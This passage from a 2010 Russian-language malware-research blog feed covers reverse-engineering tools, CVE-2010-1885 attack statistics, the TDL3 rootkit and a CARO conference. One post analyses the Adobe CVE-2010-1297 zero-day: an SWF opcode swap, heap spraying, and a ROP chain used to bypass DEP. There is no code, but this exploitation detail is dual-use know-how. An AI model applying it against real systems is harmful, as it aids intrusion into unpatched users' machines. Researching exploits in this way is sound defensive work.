целиком.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6981821187479309166?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6981821187479309166/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ida-bochs.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6981821187479309166'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6981821187479309166'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ida-bochs.html' title='IDA + Bochs: нафига оно надо?'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4674196601771696372</id><published>2010-07-05T16:17:00.000+04:00</published><updated>2010-07-05T17:16:47.610+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Decompilation'/><category scheme='http://www.blogger.com/atom/ns#' term='IdaPython'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Hex-Rays'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>Обновление IDA и Hex-Rays</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gn-7ejyJv08/TDHURMs6O7I/AAAAAAAAAoo/OVmMDMu1Q6w/s1600/idapython.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 236px;" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TDHURMs6O7I/AAAAAAAAAoo/OVmMDMu1Q6w/s320/idapython.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5490402812673801138" /&gt;&lt;/a&gt;&lt;br /&gt;Как-то неожиданно обновились на прошлой неделе сразу и IDA до версии 5.7, и Hex-Rays до версии 1.3 (еще обновился ARM Decompiler, но я его пока не использовал почти, только из любопытства немного покрутил). Hex-Rays, причем уже обновлялся относительно недавно до версии 1.2, где одним из главных нововведений была поддержка декомпиляции операций с плавающей точкой. Этот релиз больше похож на большой bugfix, где поправили много всяких недочетов и навели немного гламура на внешний вид декомпилированного листинга. Все гламурные рюшки версии 1.3 можно увидеть на &lt;a href="http://www.hex-rays.com/hexcomp13.shtml"&gt;сomparison Page&lt;/a&gt;. А changelog с багфиксами &lt;a href="http://hex-rays.com/news1.shtml#100628"&gt;здесь&lt;/a&gt;.&lt;br /&gt;Из важных нововведений для IDA, наконец-то сделали поддержку MMX/XMM регистров во строенном отладчике. Появилась возможность подгрузить отладочные символы и автоматически делать анализ кода для выбранного модуля в процессе отладки. Сильно обновился IDAPython до версии 1.4, там случился тоже большой багфикс и улучшалась скорость работы. А самое главное, теперь появилась &lt;a href="http://www.hex-rays.com/idapro/idapython_docs/"&gt;нормальная дока&lt;/a&gt; по всем методам и классам поддерживаемым в IDAPython. Полный changelog &lt;a href="http://www.hex-rays.com/idapro/57/index.htm"&gt;здесь&lt;/a&gt;. Я уже давно перешел на использование IDAPython, ибо меньше времени и удобнее нежели IDC, думаю, что дальше развивать IDC нет смысла. &lt;br /&gt;Еще интересно, что началось тестирование &lt;a href="http://hexblog.com/2010/03/preview_of_the_next_generation.html"&gt;нового интерфейса&lt;/a&gt; написанного на QT и дающего возможность нормального GUI под все поддерживаемые платформы. Наконец-то у меня будет нормальная IDA на моем маке и без использования ВМ, а не это консольное убожество.&lt;br /&gt;В этом году вообще чувствуется активная разработка и желание улучшить свои продукты со стороны разработчиков IDA, а ведь такими темпами и 6.0 не за горами. Интересно, когда они начнут нам анонсировать вкусности шестерки :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4674196601771696372?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4674196601771696372/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ida-hex-rays.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4674196601771696372'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4674196601771696372'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ida-hex-rays.html' title='Обновление IDA и Hex-Rays'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gn-7ejyJv08/TDHURMs6O7I/AAAAAAAAAoo/OVmMDMu1Q6w/s72-c/idapython.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-9203609937612725897</id><published>2010-07-01T15:04:00.003+04:00</published><updated>2010-07-14T16:38:06.933+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>CVE-2010-1885 в цифрах</title><content type='html'>Интересную &lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx"&gt;аналитику&lt;/a&gt; выкатила MS сегодня у себя в блоге. &lt;br /&gt;Предыстория такова, что 10 июня небезызвестный гуглоинженер Tavis Ormandy aka taviso обнародовал &lt;a href="http://seclists.org/fulldisclosure/2010/Jun/205"&gt;уязвимость&lt;/a&gt; в механизме проверки обращений (hcp://) к Microsoft Windows Help Centre. Собственно он не просто обнародовал уязвимость, но и открыл исходный код эксплойта. MS жаловалась на этого товарища, что он мало им дал времени для закрытия уязвимости и вообще зря затеял выкладывать такое на паблик, но обсуждать здесь сторону морали мне совсем не хочется.&lt;br /&gt;Так вот MS сегодня обнародовала цифры по количеству зафиксированных ими атак с использованием этой уязвимости, и они получились очень забавные:   &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gn-7ejyJv08/TCx22e3bDRI/AAAAAAAAAoQ/kvVDmqkv69g/s1600/CVE-2010-1885-saturation-20100629.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 350px;" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TCx22e3bDRI/AAAAAAAAAoQ/kvVDmqkv69g/s400/CVE-2010-1885-saturation-20100629.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5488892724228328722" /&gt;&lt;/a&gt;&lt;br /&gt;Так как уязвимость нацелена на пользователей Windows XP, то соответственно под ударом оказались по большей части регионы в которых процент пользователей этой операционки высокий. Мы на втором месте после Португалии, забавно :)&lt;br /&gt;Интересно также посмотреть и на динамику роста количества атак с использованием этого сплойта:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gn-7ejyJv08/TCx7aZEN5gI/AAAAAAAAAoY/iLT5y-sZWNM/s1600/CVE-2010-1885-attacks-20100629.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 303px;" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TCx7aZEN5gI/AAAAAAAAAoY/iLT5y-sZWNM/s400/CVE-2010-1885-attacks-20100629.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5488897739193181698" /&gt;&lt;/a&gt;&lt;br /&gt;Видно, что спустя уже несколько дней после публичного раскрытия уязвимости вместе с сорцами сплойта, начались целенаправленные атаки на эту уязвимость. Без публикации готового эксплойта, это временное окно немного больше, точнее процент числа атак растет не так быстро.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Update:&lt;/b&gt;&lt;br /&gt;Финальная &lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/07/13/update-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx"&gt;версия статистики&lt;/a&gt; от MS перед выпуском патча.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-9203609937612725897?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/9203609937612725897/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/07/cve-2010-1885.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9203609937612725897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9203609937612725897'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/07/cve-2010-1885.html' title='CVE-2010-1885 в цифрах'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TCx22e3bDRI/AAAAAAAAAoQ/kvVDmqkv69g/s72-c/CVE-2010-1885-saturation-20100629.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5393701932728753351</id><published>2010-06-28T13:07:00.001+04:00</published><updated>2010-10-12T15:31:35.550+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>Win32/Olmarik или исследование TDL3 в деталях</title><content type='html'>Мы тут на днях закончили подготовку материалов нашего исследования: "&lt;a href="https://docs.google.com/viewer?url=http://www.esetnod32.ru/.viruslab/analytics/win32.olmarik.pdf"&gt;Руткит Win32/Olmarik: технологии работы и распространения&lt;/a&gt;". Расковыряли мы все достаточно глубоко и подробно, поэтому в отчете присутствует информация, которой раньше я не встречал на паблике (тем более на русском языке).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5393701932728753351?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5393701932728753351/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/06/win32olmarik-tdl3.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5393701932728753351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5393701932728753351'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/06/win32olmarik-tdl3.html' title='Win32/Olmarik или исследование TDL3 в деталях'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1258732491172960226</id><published>2010-06-23T14:50:00.000+04:00</published><updated>2010-06-23T14:58:33.422+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='heap-spray'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Heap Spraying Attack Detection with Nozzle (MS Research project)</title><content type='html'>&lt;object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="512" height="384"&gt;&lt;br /&gt;&lt;param name="source" value="http://channel9.msdn.com/App_Themes/default/VideoPlayer10_01_18.xap" /&gt;&lt;br /&gt;&lt;param name="initParams" value="deferredLoad=true,duration=0,m=http://mschnlnine.vo.llnwd.net/d1/ch9/2/4/1/2/6/4/nozzleheapsparydetection_2MB_ch9.wmv,autostart=false,autohide=true,showembed=true, thumbnail=http://mschnlnine.vo.llnwd.net/d1/ch9/2/4/1/2/6/4/nozzleheapsparydetection_large_ch9.png, postid=462142" /&gt;&lt;br /&gt;&lt;param name="background" value="#00FFFFFF" /&gt;&lt;br /&gt;&lt;a href="http://go.microsoft.com/fwlink/?LinkID=124807" style="text-decoration: none;"&gt;&lt;br /&gt;&lt;img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight" style="border-style: none"/&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1258732491172960226?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1258732491172960226/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/06/heap-spraying-attack-detection-with.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1258732491172960226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1258732491172960226'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/06/heap-spraying-attack-detection-with.html' title='Heap Spraying Attack Detection with Nozzle (MS Research project)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5431365783331099360</id><published>2010-06-19T00:27:00.000+04:00</published><updated>2010-07-06T20:00:22.101+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PDF'/><category scheme='http://www.blogger.com/atom/ns#' term='ASLR'/><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='heap-spray'/><category scheme='http://www.blogger.com/atom/ns#' term='ROP'/><category scheme='http://www.blogger.com/atom/ns#' term='codname Aurora'/><category scheme='http://www.blogger.com/atom/ns#' term='Adobe'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='DEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Adobe ≠ безопасность или "долгоиграющий" 0-day</title><content type='html'>На протяжении всего текущего года компания Adobe уже не раз нас радовала серьезными уязвимостями, которые влекли за собой возможность удаленного выполнения произвольного кода. В этот раз очередной "шедевр" (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297"&gt;CVE-2010-1297&lt;/a&gt;) был связан с уязвимостью в Adobe Reader и некоторыми особенностями обработки встроенных в pdf флеш-роликов. Многие уязвимости в продуктах Adobe (CVE-2010-129 входит в их число) могут эксплуатироваться не только на платформе windows, но на многих других, на которые они официально подставляются. Другое дело, что провести успешную атаку эксплойтом на одних плотформах проще, а на других сложнее. Сама Adobe не спешит выпускать заплатку для этой уязвимости и она запланирована только на конец июня, получается, что пользователи продукции этой компании подвержены риску почти на протяжении целого месяца. На мой взгляд для столь массовых продуктов это просто не допустимо. Ну, а теперь давайте рассмотрим саму уязвимость.&lt;br /&gt;Итак, уязвимость находиться в модуле authplay.dll, при обработке специально сформированного SWF. Корнем зла на этот раз оказался тег DoABC, использующийся при вставке swf в pdf-файлы. Во вредоносном SWF-файле заменен всего лишь один опкод, но именно он и приводит к ошибке. Оригинальный байт-код 0x66 (GetProperty) заменен на 0x40 (newfunction).&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gn-7ejyJv08/TB3qK85PA5I/AAAAAAAAAnc/FwdXbSsLmV4/s1600/DoABC.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 150px;" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TB3qK85PA5I/AAAAAAAAAnc/FwdXbSsLmV4/s400/DoABC.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5484797395072910226" /&gt;&lt;/a&gt;&lt;br /&gt;Судя по всему уязвимость была найдена с применением методов фаззинга файловых форматов.       &lt;br /&gt;Но выполнению SWF предшествует &lt;a href="http://en.wikipedia.org/wiki/Heap_spraying"&gt;heap-spraying&lt;/a&gt;, используется для обхода DEP.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gn-7ejyJv08/TB31i7LgUWI/AAAAAAAAAnk/Vkatt0_y2Wc/s1600/spray0.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 168px;" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TB31i7LgUWI/AAAAAAAAAnk/Vkatt0_y2Wc/s400/spray0.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5484809901557436770" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gn-7ejyJv08/TB32vjzl5dI/AAAAAAAAAn0/KV3iRU_nvms/s1600/spray1.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 331px;" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TB32vjzl5dI/AAAAAAAAAn0/KV3iRU_nvms/s400/spray1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5484811218133050834" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gn-7ejyJv08/TB32ST2xW9I/AAAAAAAAAns/_ZqBvJddmeM/s1600/spray2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 351px;" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TB32ST2xW9I/AAAAAAAAAns/_ZqBvJddmeM/s400/spray2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5484810715635211218" /&gt;&lt;/a&gt;&lt;br /&gt;В итоге мы получаем ret2lib в BIB.DLL, после чего начинается выполнение шелл-кода. Подобная техника обхода DEP была использована в нашумевшей атаке &lt;a href="http://amatrosov.blogspot.com/search/label/codname%20Aurora"&gt;codname: Aurora&lt;/a&gt;. Сейчас она приминяется очень часто в различных эксплойтах. &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gn-7ejyJv08/TB33F_81qqI/AAAAAAAAAn8/NsQDihuwSFw/s1600/spray3.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 84px;" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TB33F_81qqI/AAAAAAAAAn8/NsQDihuwSFw/s400/spray3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5484811603645147810" /&gt;&lt;/a&gt;&lt;br /&gt;Для того чтобы попасть в библиотеку BIB.dll используются техники return-oriented programming (&lt;a href="http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/"&gt;ROP&lt;/a&gt;), недостаток этого метода в достаточно длительном времени работы. Например, &lt;a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb"&gt;публичный эксплойт&lt;/a&gt; на CVE-2010-1297, опубликованный в рамках Metasploit. Оказался очень медленным и нестабильным в работе.&lt;br /&gt;На днях была опубликована программа BH'2010 USA та, что проводиться в Вегасе и на ней было замечено достаточно большое количество докладов посвященных ROP. Конец лета будет интересным :)    &lt;br /&gt;&lt;br /&gt;Напоследок небольшая демка, которую я записал для корпоративного блога, но мне она нравится и пожалуй продублирую ее здесь тоже :) На ней отчетливо видно, как не быстро отрабатывает ROP shellcode (из Metasploit'а работает как минимум в двое медленее). В качестве сандтрека была взята заглавная тема к фильму &lt;a href="http://en.wikipedia.org/wiki/Pi_(film)"&gt;Pi&lt;/a&gt;.&lt;br /&gt;&lt;object width="560" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/0SuXM0qmwrA&amp;hl=ru_RU&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;hd=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/0SuXM0qmwrA&amp;hl=ru_RU&amp;fs=1&amp;color1=0x3a3a3a&amp;color2=0x999999&amp;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Материал по теме:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/"&gt;Подробное исследование от Zynamics&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.symantec.com/connect/blogs/analysis-zero-day-exploit-adobe-flash-and-reader"&gt;Исследование от Symantec&lt;/a&gt;&lt;br /&gt;&lt;a href="http://community.websense.com/blogs/securitylabs/archive/2010/06/09/having-fun-with-adobe-0-day-exploits.aspx"&gt;Исследование от Websense&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5431365783331099360?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5431365783331099360/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/06/adobe-0-day.html#comment-form' title='Комментарии: 5'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5431365783331099360'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5431365783331099360'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/06/adobe-0-day.html' title='Adobe ≠ безопасность или &quot;долгоиграющий&quot; 0-day'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gn-7ejyJv08/TB3qK85PA5I/AAAAAAAAAnc/FwdXbSsLmV4/s72-c/DoABC.png' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6080154969516942982</id><published>2010-05-29T17:49:00.001+04:00</published><updated>2011-05-28T01:11:55.505+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='codname Aurora'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='CARO'/><title type='text'>CARO'2010: Итоги</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://caro2010.org/"&gt;Конференция&lt;/a&gt; в этом году была посвящена "Большим числам" и лишь немногие доклады не попадали под эту тему. Еще интересной особенностью этой конференции является то, что не все доклады рассчитаны на широкую огласку и их презентации не будут доступны для скачивания. Таких докладов было немного и некоторые из них не содержали ничего такого, что нельзя было разгласить, но авторы решили перестраховаться. К примеру, один из таких докладов был «Anatomy of a Targeted Attack with Global consequences» , где на примере нашумевшей атаки Aurora, рассказали о возможных целенаправленных атаках. В принципе ничего нового я из доклада для себя не узнал, но презентация была хорошая, вся информация по этой атаки была хорошо структурирована. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Хорошая презентация была «&lt;a href="http://www.f-secure.com/weblog/archives/Zhenxian_Wang-Virtual_machine_protection.pdf"&gt;Virtual Machine Protection Technology and AV Industry&lt;/a&gt;»но обфусцированный китайский-английский воспринимался очень сложно. Докладчик поднял вопрос о проблемах анализа виртуализованного кода и возможных подходах к решению этой проблемы.  &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Докладчик из G-Data рассказал о системе &lt;a href="http://monkeywrench.de/"&gt;MonkeyWrench&lt;/a&gt; «&lt;a href="http://www.f-secure.com/weblog/archives/Armin_B_Monkeywrench.pdf"&gt;Detecting malicious web pages with MonkeyWrench&lt;/a&gt;» для обнаружения вредоносной активности на веб-страницах. Планы у них грандиозные и они даже готовы сотрудничать и обмениваться коллекциями. Система интересная, но пока Wepawet круче. Песочница MonkeyWrench основана на принципе эмуляции работы различных браузерных платформ. В ней так же реализованы некоторые эвристические подходы к распознаванию shellcode-последовательностей. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Наверное, больше всех мне понравился доклад “&lt;a href="http://www.f-secure.com/weblog/archives/Tim_Ebringer_Marius_G-Indexing_large_volumes.pdf"&gt;Indexing Large Volumes of Binary Content for Fast Search&lt;/a&gt;”, речь там шла о реализации системы быстрого поиска последовательностей в бинарных файлах (PE, ELF …). Сам докладчик очень живенько рассказывал о своей системе, но кроме слов демонстрировал полученные результаты на реальной системе. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Все остальные доклады были тоже интересные, но почему –то  больше всего запомнились именно вышеописанные. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Организаторами конференции этого года выступила финская антивирусная компания F-Secure и хочется отдельно поблагодарить Mikko Hyppönen за то, что он приложил много усилий, чтобы от конференции остались только положительные впечатления. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;P.S.&lt;/span&gt;: Лишь в первый день была хорошая погода и удалось немного по фотографировать достопримечательности Хельсинки. &lt;/div&gt;&lt;object height="375" width="500"&gt;&lt;param name="flashvars" value="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96391" /&gt;&lt;param name="bgcolor" value="#000000" /&gt;&lt;param name="movie" value="http://fotki.yandex.ru/swf/slideshow" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed src="http://fotki.yandex.ru/swf/slideshow" allowFullScreen="true" width="500" height="375" flashvars="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96391" type="application/x-shockwave-flash" bgcolor="#000000" /&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6080154969516942982?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6080154969516942982/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010_29.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6080154969516942982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6080154969516942982'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010_29.html' title='CARO&apos;2010: Итоги'/><author><name>Aleks 